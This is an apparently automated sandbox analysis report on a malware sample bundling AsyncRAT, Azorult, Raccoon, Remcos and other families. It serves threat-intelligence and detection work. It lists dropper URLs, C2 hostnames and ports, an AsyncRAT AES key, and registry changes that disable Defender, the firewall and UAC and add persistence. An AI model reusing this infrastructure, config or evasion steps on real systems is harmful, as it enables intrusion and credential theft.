asyncrat | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
1806s
max time network
1816s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

amtemu.v0.9.2.win-painter_edited.exe

Score

10^/10

asyncrat azorult betabot modiloader oski raccoon remcos 5e4db353b88c002ba6466c06437973619aad03b3 backdoor botnet discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Extracted

Family

remcos

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
BetaBot
Beta Bot is a Trojan that infects computers and disables Antivirus.
trojan backdoor botnet betabot

Contains code to disable Windows Defender 10 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral24/memory/496-621-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/496-620-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral24/memory/1772-632-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral24/memory/1772-633-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral24/files/0x000200000001ab95-663.dat	disable_win_def
behavioral24/files/0x000200000001ab95-662.dat	disable_win_def
behavioral24/memory/5660-1156-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/5852-1166-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral24/files/0x000400000001abc1-1190.dat	disable_win_def
behavioral24/files/0x000400000001abc1-1189.dat	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies firewall policy service 2 TTPs 8 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	9119gy3q5_1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	9119gy3q5_1.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	9119gy3q5_1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	9119gy3q5_1.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	explorer.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\ImagePath	regedit.exe

Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral24/memory/552-611-0x000000000040C76E-mapping.dmp	asyncrat
behavioral24/memory/552-610-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral24/memory/1928-1147-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 2 IoCs

resource	yara_rule
behavioral24/memory/4504-682-0x0000000002A60000-0x0000000002ABC000-memory.dmp	modiloader_stage1
behavioral24/memory/4828-1199-0x0000000002A70000-0x0000000002ACC000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

flow	pid	Process
24	5112	powershell.exe
26	5112	powershell.exe
28	4412	powershell.exe
30	4412	powershell.exe
32	4464	powershell.exe
34	4464	powershell.exe

Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 50 IoCs

pid	Process
3604	key.exe
3212	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3140	data.dat
4472	bb.exe
652	bb.exe
1780	puttty.exe
928	ereds.exe
3684	Keygen.exe
720	nqu.exe
5096	ejf.exe
1796	FGbfttrev.exe
4240	FDvbcgfert.exe
4236	ejf.exe
2012	abx.exe
5116	FGbfttrev.exe
4404	FDvbcgfert.exe
4244	hGSBLC0mMB.exe
4504	9Dq25VPs74.exe
4660	BKqzN9zoCZ.exe
4380	MYbv6sblhd.exe
4428	9119gy3q5_1.exe
4468	9119gy3q5_1.exe
3132	hGSBLC0mMB.exe
552	hGSBLC0mMB.exe
2788	BKqzN9zoCZ.exe
496	BKqzN9zoCZ.exe
1772	MYbv6sblhd.exe
3964	nynibecq.exe
4572	i533usso357o795.exe
5252	333u357995k.exe
5300	azchgftrq.exe
5472	nqu.exe
5052	nqu.exe
5888	FGbfttrev.exe
5404	FDvbcgfert.exe
3960	333u357995k.exe
5284	FDvbcgfert.exe
4624	FGbfttrev.exe
5484	RxfEjqsctc.exe
4828	QufVBH3jUE.exe
5512	fYDz9wNnYe.exe
3876	a0k7SvAzhM.exe
3620	ozchgftrq.exe
1404	azchgftrq.exe
5456	RxfEjqsctc.exe
1928	RxfEjqsctc.exe
5660	fYDz9wNnYe.exe
5852	a0k7SvAzhM.exe
5848	2eurzuuj.exe
1336	ozchgftrq.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe

Loads dropped DLL 22 IoCs

pid	Process
3140	data.dat
4236	ejf.exe
4404	FDvbcgfert.exe
4404	FDvbcgfert.exe
4404	FDvbcgfert.exe
4236	ejf.exe
4236	ejf.exe
4236	ejf.exe
4236	ejf.exe
4236	ejf.exe
5052	nqu.exe
5052	nqu.exe
5052	nqu.exe
5052	nqu.exe
5052	nqu.exe
5052	nqu.exe
5284	FDvbcgfert.exe
5284	FDvbcgfert.exe
5284	FDvbcgfert.exe
1336	ozchgftrq.exe
1336	ozchgftrq.exe
1336	ozchgftrq.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	MYbv6sblhd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	MYbv6sblhd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	a0k7SvAzhM.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\""	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url"	9Dq25VPs74.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	data.dat
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\""	data.dat
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\""	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\""	data.dat
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\""	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	data.dat

Checks for any installed AV software in registry 1 TTPs 2 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService	9119gy3q5_1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus	9119gy3q5_1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 15 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9119gy3q5_1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i533usso357o795.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	key.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	puttty.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Keygen.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.dat
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nqu.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ejf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	333u357995k.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Google Updater 5.0\desktop.ini	explorer.exe
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	nqu.exe
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	ejf.exe

Maps connected drives based on registry 3 TTPs 32 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	data.dat
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	data.dat
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	nqu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	ejf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	dw20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	i533usso357o795.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	puttty.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	333u357995k.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	333u357995k.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	nqu.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	ejf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	i533usso357o795.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	puttty.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
652	bb.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
3140	data.dat
3140	data.dat
3140	data.dat
3140	data.dat
1780	puttty.exe
1780	puttty.exe
1780	puttty.exe
1780	puttty.exe
1288	explorer.exe
1288	explorer.exe
5044	cmd.exe
3684	Keygen.exe
1428	dw20.exe
3604	key.exe
3684	Keygen.exe
3684	Keygen.exe
3684	Keygen.exe
4464	powershell.exe
1428	dw20.exe
1428	dw20.exe
1428	dw20.exe
3604	key.exe
3604	key.exe
3604	key.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
4236	ejf.exe
4236	ejf.exe
556	powershell.exe
556	powershell.exe
556	powershell.exe
5116	FGbfttrev.exe
556	powershell.exe
5116	FGbfttrev.exe
4404	FDvbcgfert.exe
4404	FDvbcgfert.exe
4668	powershell.exe
720	nqu.exe
720	nqu.exe
720	nqu.exe
720	nqu.exe
4236	ejf.exe
4236	ejf.exe
4236	ejf.exe
4236	ejf.exe
1288	explorer.exe
1288	explorer.exe
1288	explorer.exe
4468	9119gy3q5_1.exe
4172	cmd.exe
4172	cmd.exe
4172	cmd.exe
4172	cmd.exe
4572	i533usso357o795.exe
4572	i533usso357o795.exe
4572	i533usso357o795.exe

Suspicious use of SetThreadContext 19 IoCs

description	pid	Process	procid_target
PID 4472 set thread context of 652	4472	bb.exe	92
PID 5096 set thread context of 4236	5096	ejf.exe	131
PID 1796 set thread context of 5116	1796	FGbfttrev.exe	133
PID 4240 set thread context of 4404	4240	FDvbcgfert.exe	134
PID 4428 set thread context of 4468	4428	9119gy3q5_1.exe	147
PID 4244 set thread context of 552	4244	hGSBLC0mMB.exe	150
PID 4660 set thread context of 496	4660	BKqzN9zoCZ.exe	152
PID 4380 set thread context of 1772	4380	MYbv6sblhd.exe	154
PID 720 set thread context of 5052	720	nqu.exe	194
PID 5252 set thread context of 3960	5252	333u357995k.exe	198
PID 5404 set thread context of 5284	5404	FDvbcgfert.exe	199
PID 5888 set thread context of 4624	5888	FGbfttrev.exe	200
PID 4504 set thread context of 5056	4504	9Dq25VPs74.exe	213
PID 5300 set thread context of 1404	5300	azchgftrq.exe	221
PID 5484 set thread context of 1928	5484	RxfEjqsctc.exe	223
PID 5512 set thread context of 5660	5512	fYDz9wNnYe.exe	224
PID 3876 set thread context of 5852	3876	a0k7SvAzhM.exe	225
PID 4828 set thread context of 7132	4828	QufVBH3jUE.exe	262
PID 3620 set thread context of 1336	3620	ozchgftrq.exe	263

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	9119gy3q5_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	bb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	9119gy3q5_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ozchgftrq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	bb.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
980	timeout.exe
1948	timeout.exe
4092	timeout.exe
196	timeout.exe
4984	timeout.exe
6028	timeout.exe
2776	timeout.exe
3460	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	explorer.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
804	taskkill.exe
2444	taskkill.exe
5552	taskkill.exe
3084	taskkill.exe
2936	taskkill.exe

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	explorer.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	explorer.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0"	regedit.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
4480	reg.exe
5584	reg.exe
5356	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	9Dq25VPs74.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	9Dq25VPs74.exe

NTFS ADS 2 IoCs

description	ioc	Process
